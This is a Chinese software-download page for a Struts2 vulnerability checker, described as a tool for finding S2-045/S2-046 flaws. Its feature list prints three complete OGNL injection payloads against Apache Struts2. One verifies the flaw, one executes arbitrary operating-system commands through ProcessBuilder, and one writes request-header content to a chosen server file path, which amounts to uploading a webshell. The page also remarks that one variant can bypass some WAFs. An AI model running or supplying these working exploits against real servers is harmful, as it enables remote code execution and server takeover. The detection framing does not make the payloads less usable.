绿茶软件园
首页 > 软件下载 > 系统软件 > 系统检测 > struts2漏洞检测工具 v1.8 官方版
更多下载地址
struts2漏洞检测工具 v1.8 官方版

软件大小:8.82KB

软件语言:简体中文

软件授权:官方版

软件类别:系统检测

软件等级:

更新时间:2017-08-31

官方网站:www.33LC.com

应用平台:/Win8/Win7/WinXP

  • 软件介绍
  • 软件截图
  • 下载地址

struts2漏洞检测工具是款非常优秀的系统漏洞检测工具。struts2漏洞检测工具能够帮助用户检测网络、系统、邮件、服务器的漏洞,帮助用户降低和缓解漏洞有可能造成的威胁和损失,对以探测的漏洞进行修复,有效防止黑客攻击。

 

struts2漏洞检测工具简介:

2017版增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。当Struts2开启devMode模式时,将导致严重远程代码执行漏洞。如果WebService启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。

 

struts2漏洞检测工具功能介绍:

1、验证漏洞,修改Content-Type,返回内容为“webpath”代表存在漏洞。

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).

(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).

(#res=@org.apache.struts2.ServletActionContext@getResponse()).

(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).

(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}

2、执行命令

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).

(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).

(#res=@org.apache.struts2.ServletActionContext@getResponse()).

(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new

java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).

(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).

(#res.getWriter().close()).(#s.close())}

3、上传文件:

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).

(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).

(#res=@org.apache.struts2.ServletActionContext@getResponse()).

(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new

java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).

(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).

(#res.getWriter().close())}

软件截图
  • struts2漏洞检测工具 v1.8 官方版
  • 热门软件
  • 热门标签
idm下载器 v6.32.1 简体中文版 火绒安全软件 v4.0.74.12 官方版 鲁大师最新版 v5.15.18.1120 官方版 百度网盘2018最新版 v6.5.0.3 官方版 360安全卫士2018最新版 v11.5.0.2016 官方版 鲁大师2018最新版 v5.15.18.1120 官方版 谷歌浏览器 dev v72.0.3610.2 官方版 360安全卫士最新版 v11.6.0.1030 官方版 cpu-z 64位 v1.87.0 绿色版 易大师网络工具箱 v2018.11.15 绿色版 火绒安全实验室 v4.0.74.13 官方版 tablacus explorer v18.11.14 绿色版 firefox浏览器 v63.0.3 官方版 瑞星安全云终端软件 v3.0.0.84 官方版 优启通u盘启动盘制作工具 3.3.2018.1017 官方最新版 傲游浏览器(maxthon) v5.2.6.600 最新版 金山毒霸11 v4.5 官方正式版 万能驱动助理win10 64位/32位 v7.18.1018.1 官方版 火狐浏览器(firefox) v64 beta10 官方版 自由天空万能驱动助理win7 32位 v7.18.1018.1 官网正式版 360安全卫士win10版 v11.6.0.1027 官方版 2345加速浏览器2018 v9.5.1 官方版 驱动人生7 v7.1.18.58 官方版 qq浏览器2018最新版 v10.3.2727 官方版 瑞星杀毒软件2018 v24.17.04.64 官方版 蓝梦大华监控录像恢复软件 v1.60 官方版 360安全卫士 v11.6.0.1027 官方版 美图秀秀2018电脑版 v6.1.0.1 官方版 glary disk cleaner v5.0.1.154 官方版 bkviewer(数码相片浏览工具) v5.1j 绿色版 wise registry cleaner v10.1.2 中文版 wise disk cleaner free v10.1.3 中文绿色版 图片工厂(picosmos tools) v2.1.1 官方版 wine(linux模拟器) v3.20 官方版 adobe illustrator cc 2019 v23.0 64位中文版
返回顶部